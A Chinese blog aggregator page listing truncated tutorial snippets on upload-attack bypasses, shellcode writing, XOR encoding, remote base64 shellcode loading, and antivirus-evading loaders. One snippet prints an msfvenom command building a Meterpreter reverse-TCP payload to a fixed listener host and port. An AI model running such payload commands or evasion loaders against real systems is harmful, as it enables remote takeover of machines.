参考教程:《Upload Attack Framework V1.0》 1、文件上传检测客户端javascript 检测(通常为检测文件扩展名)服务端MIME 类型检测(检测Content-Type 内容)服务端目录路径检测(检测跟path 参数相关的内容)、服务端文件扩展名检测(检测跟文件exte ...
分类:
其他好文 时间:
2021-07-22 17:35:31
阅读次数:
0
Linux_shellcode总结 参考https://b0ldfrev.gitbook.io/note/pwn/linux_shellcode 在寄存器都是非理想值情况下(shellcode可根据环境具体触发时寄存器的值做长度调整),本着最优通用的原则,整理了Linux下32位和64位最短通用sh ...
分类:
系统相关 时间:
2021-06-02 20:48:28
阅读次数:
0
软件漏洞-ShellCode加解密 ShellCode应该尽量避免大量的00,要解决这个问题需要对shellcode进行编码 shellcode的编码 shellcode的编码必须要可逆,不然怎么返回执行呢 所以直接用异或xor来处理 假设用 xor a,b来处理 a是我们的shellcode b是 ...
分类:
系统相关 时间:
2021-04-06 15:09:08
阅读次数:
0
软件漏洞-跳板指令定位shellcode 上一次我们写的shellcode通过栈来看是这样的 唯一的问题就是这里的返回地址是写死了的,因为栈内存的地址是经常改变的 解决如何跳转到shellcode地址的问题 在我们的shellcode指令前有一个ret指令 ret 在汇编中执行ret的指令时,需要进 ...
分类:
系统相关 时间:
2021-03-29 12:36:31
阅读次数:
0
使用CS里面生成payload,选择python 勾选64位。 将shellcode代码编码成BASE64 放在远程服务器上 反序列化代码 import pickle import base64 shellcode = """ import ctypes,urllib.request,codecs, ...
分类:
编程语言 时间:
2021-01-12 11:01:03
阅读次数:
0
1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 int v3; // ST2C_4 4 void *v4; // ST30_4 5 int v5; // ST38_4 6 char s; // [esp ...
分类:
系统相关 时间:
2020-12-16 11:50:13
阅读次数:
5
做病毒和做保护的人,对shellcode一定不陌生。shellcode不依赖环境,放到任何地方都可以执行的机器码。 shellcode编写注意事项: 1.不能有全局变量:因为shellcode不依赖环境 2.不能使用常量字符串: 首先先定义两个相同含义的字符串 在编写shellcode字符串的过程中 ...
分类:
系统相关 时间:
2020-07-26 02:00:28
阅读次数:
89
/* * 作者: 冷却 * 时间: 2009年2月21日 * E-mail: leng_que@yahoo.com.cn * 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式 * 备注:在WindowsXP SP3下测试成功 */ //一段打开Windows计算器(calc ...
分类:
系统相关 时间:
2020-07-15 23:57:19
阅读次数:
104
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c 将payload给copy下来 ...
分类:
编程语言 时间:
2020-07-11 09:26:03
阅读次数:
85
ret2shellcode 题目是在jarvis OJ上的 题目链接:https://dn.jarvisoj.com/challengefiles/level1.80eacdcd51aca92af7749d96efad7fb5 一道非常典型的shellcode题,话不多说,直接开整 首先我们还是先要 ...
分类:
系统相关 时间:
2020-07-10 00:38:37
阅读次数:
94
